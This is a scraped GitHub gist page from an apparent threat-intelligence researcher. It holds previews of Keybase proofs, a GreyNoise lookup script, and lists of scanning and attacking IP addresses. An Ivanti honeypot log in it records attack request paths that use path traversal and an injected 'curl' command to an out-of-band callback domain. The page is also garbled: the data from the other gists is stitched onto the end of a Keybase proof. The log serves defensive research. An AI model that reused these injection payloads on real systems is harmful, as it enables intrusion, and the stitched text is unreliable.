Andrew Morris andrew-morris

## keybase.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                andrew-morris
                / keybase.md
            
            
              Created
              March 6, 2024 19:36
            
              
                keybase.md
              
          
    Keybase proof

I hereby claim:

I am andrew---morris on github.
I am morris (https://keybase.io/morris) on keybase.
I have a public key whose fingerprint is 1F50 1325 8595 EC49 9A71  8AD1 C0B9 E4CA 97CE 2C60

To claim this, I am signing this object:

  
## ivanti.csv
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../

## greynoise_enrich_cve_2021_44228.sh
curl -s https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw/170f7d6cf92172443ecc68db0b6cbd4d8226a398/CVE-2021-44228_IPs.csv | cut -d, -f1 | while read ip;do curl -XGET -s https://api.greynoise.io/v3/community/$ip;done | jq -s

## 7aac1a57-4f05-48db-8d55-950674d3eefc.csv

          
            ip
            classification
            first_seen
            last_seen

            
              20.86.27.229
              unknown
              2021-10-07
              2021-10-13

            
              196.196.216.5
              unknown
              2021-10-13
              2021-10-13

            
              194.147.158.42
              malicious
              2021-07-26
              2021-10-13

            
              20.50.139.51
              unknown
              2021-05-27
              2021-10-13

            
              103.229.41.5
              unknown
              2021-10-09
              2021-10-12

            
              91.211.52.221
              malicious
              2018-05-19
              2021-10-12

            
              116.110.156.140
              malicious
              2021-10-12
              2021-10-12

            
              2.61.251.177
              unknown
              2021-10-08
              2021-10-12

            
              194.147.158.42
              malicious
              2021-07-26
              2021-10-12

## big_dns_requests.md

      
              1 file
            
          
              0 forks
            
          
                1 comment
              
            
              0 stars
            
          
                andrew-morris
                / big_dns_requests.md
            
            
              Created
              July 15, 2020 18:59
            
              
                big dns requests
              
          
    I'm doing a bit of cursory research into GreyNoise data WRT CVE-2020-1350.
The following IPs have blasted the Internet with large DNS requests (>1000 bytes) in the past 24 hours:
(sorted by packet count)
  16 89.196.51.73
  13 5.209.199.204
  12 62.102.143.106
  10 188.212.245.149


## adb_worms.csv
ip,tag_name,category,confidence,org,rdns,rdns_parent,datacenter,asn,country,type,os,tor,created,updated
5.152.142.44,ADB Worm,worm,high,alternatYva S.r.l.,,,,AS199026,IT,business,,false,2018-07-11 16:34:40,2018-07-11 16:34:40
172.56.41.28,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:43:46,2018-07-11 14:43:46
182.113.100.116,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 14:25:43,2018-07-11 14:25:43
172.56.21.52,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:02:23,2018-07-11 14:02:23
172.58.201.119,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:23:11,2018-07-11 13:23:11
172.58.232.84,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:00:38,2018-07-11 13:00:38
222.140.131.222,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 12:51:00,2018-07-11 12:51:00
172.58.175.63

## jacked.txt
RATIO ASN POPPED SIZE ORG
0.3945 AS52635 404 1024 SPEEDCONNECT - TECNOLOGIA E EQUIPAMENTOS
0.2500 AS60490 1 4 MTS PJSC
0.2500 AS198517 1 4 DOLNET GROUP sp. z o.o.
0.2158 AS263256 442 2048 PROVEDOR DE INTERNET EXTREMA LTDA - ME
0.2080 AS264643 213 1024 Enredes S.A.
0.1941 AS133469 795 4096 Multinet (Udaipur) Private Limited
0.1592 AS263051 326 2048 Infopardall Ltda me
0.1426 AS133692 146 1024 Fastnet Communication Pvt. Ltd.
0.1406 AS135195 36 256 NS COMPUTERS

## claymore_attackers.txt
2018-05-11 187.136.89.107	Uninet S.A. de C.V.
2018-05-11 187.144.147.60	Uninet S.A. de C.V.
2018-05-11 187.144.221.151	Uninet S.A. de C.V.
2018-05-09 187.214.10.43	Uninet S.A. de C.V.
2018-05-11 189.130.179.145	Gestión de direccionamiento UniNet
2018-05-11 189.152.107.245	Gestión de direccionamiento UniNet
2018-05-11 189.163.122.185	Gestión de direccionamiento UniNet
2018-05-11 189.163.143.187	Gestión de direccionamiento UniNet
2018-05-11 189.163.242.157	Gestión de direccionamiento UniNet
2018-05-11 189.175.244.203	Gestión de direccionamiento UniNet

## historical_8291_TCP_scanners.txt
118.116.127.196|2018-03-22
62.28.56.161|2018-03-22
185.109.161.38|2018-03-22
185.109.161.38|2018-03-21
62.28.56.161|2018-03-21
5.188.11.89|2018-03-21
77.72.82.22|2018-03-21
91.217.9.163|2018-03-20
5.188.11.89|2018-03-20
5.188.11.89|2018-03-19

## keybase.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                andrew-morris
                / keybase.md
            
            
              Created
              January 18, 2018 21:10
            
          
    Keybase proof

I hereby claim:

I am andrew-morris on github.
I am morris (https://keybase.io/morris) on keybase.
I have a public key ASBlpwslKu2sXbUuQprFS7K1c0TheWE4rgh79uiwuUYNlQo

To claim this, I am signing this object:
	Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
	1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
	1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
	1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
	1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
ip	classification	first_seen	last_seen
20.86.27.229	unknown	2021-10-07	2021-10-13
196.196.216.5	unknown	2021-10-13	2021-10-13
194.147.158.42	malicious	2021-07-26	2021-10-13
20.50.139.51	unknown	2021-05-27	2021-10-13
103.229.41.5	unknown	2021-10-09	2021-10-12
91.211.52.221	malicious	2018-05-19	2021-10-12
116.110.156.140	malicious	2021-10-12	2021-10-12
2.61.251.177	unknown	2021-10-08	2021-10-12
194.147.158.42	malicious	2021-07-26	2021-10-12
	ip,tag_name,category,confidence,org,rdns,rdns_parent,datacenter,asn,country,type,os,tor,created,updated
	5.152.142.44,ADB Worm,worm,high,alternatYva S.r.l.,,,,AS199026,IT,business,,false,2018-07-11 16:34:40,2018-07-11 16:34:40
	172.56.41.28,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:43:46,2018-07-11 14:43:46
	182.113.100.116,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 14:25:43,2018-07-11 14:25:43
	172.56.21.52,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 14:02:23,2018-07-11 14:02:23
	172.58.201.119,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:23:11,2018-07-11 13:23:11
	172.58.232.84,ADB Worm,worm,high,"T-Mobile USA, Inc.",,,,AS21928,US,isp,,false,2018-07-11 13:00:38,2018-07-11 13:00:38
	222.140.131.222,ADB Worm,worm,high,China Unicom Henan province network,hn.kd.ny.adsl,ny.adsl,,AS4837,CN,isp,,false,2018-07-11 12:51:00,2018-07-11 12:51:00
	172.58.175.63
	RATIO ASN POPPED SIZE ORG
	0.3945 AS52635 404 1024 SPEEDCONNECT - TECNOLOGIA E EQUIPAMENTOS
	0.2500 AS60490 1 4 MTS PJSC
	0.2500 AS198517 1 4 DOLNET GROUP sp. z o.o.
	0.2158 AS263256 442 2048 PROVEDOR DE INTERNET EXTREMA LTDA - ME
	0.2080 AS264643 213 1024 Enredes S.A.
	0.1941 AS133469 795 4096 Multinet (Udaipur) Private Limited
	0.1592 AS263051 326 2048 Infopardall Ltda me
	0.1426 AS133692 146 1024 Fastnet Communication Pvt. Ltd.
	0.1406 AS135195 36 256 NS COMPUTERS
	2018-05-11 187.136.89.107 Uninet S.A. de C.V.
	2018-05-11 187.144.147.60 Uninet S.A. de C.V.
	2018-05-11 187.144.221.151 Uninet S.A. de C.V.
	2018-05-09 187.214.10.43 Uninet S.A. de C.V.
	2018-05-11 189.130.179.145 Gestión de direccionamiento UniNet
	2018-05-11 189.152.107.245 Gestión de direccionamiento UniNet
	2018-05-11 189.163.122.185 Gestión de direccionamiento UniNet
	2018-05-11 189.163.143.187 Gestión de direccionamiento UniNet
	2018-05-11 189.163.242.157 Gestión de direccionamiento UniNet
	2018-05-11 189.175.244.203 Gestión de direccionamiento UniNet
	118.116.127.196\|2018-03-22
	62.28.56.161\|2018-03-22
	185.109.161.38\|2018-03-22
	185.109.161.38\|2018-03-21
	62.28.56.161\|2018-03-21
	5.188.11.89\|2018-03-21
	77.72.82.22\|2018-03-21
	91.217.9.163\|2018-03-20
	5.188.11.89\|2018-03-20
	5.188.11.89\|2018-03-19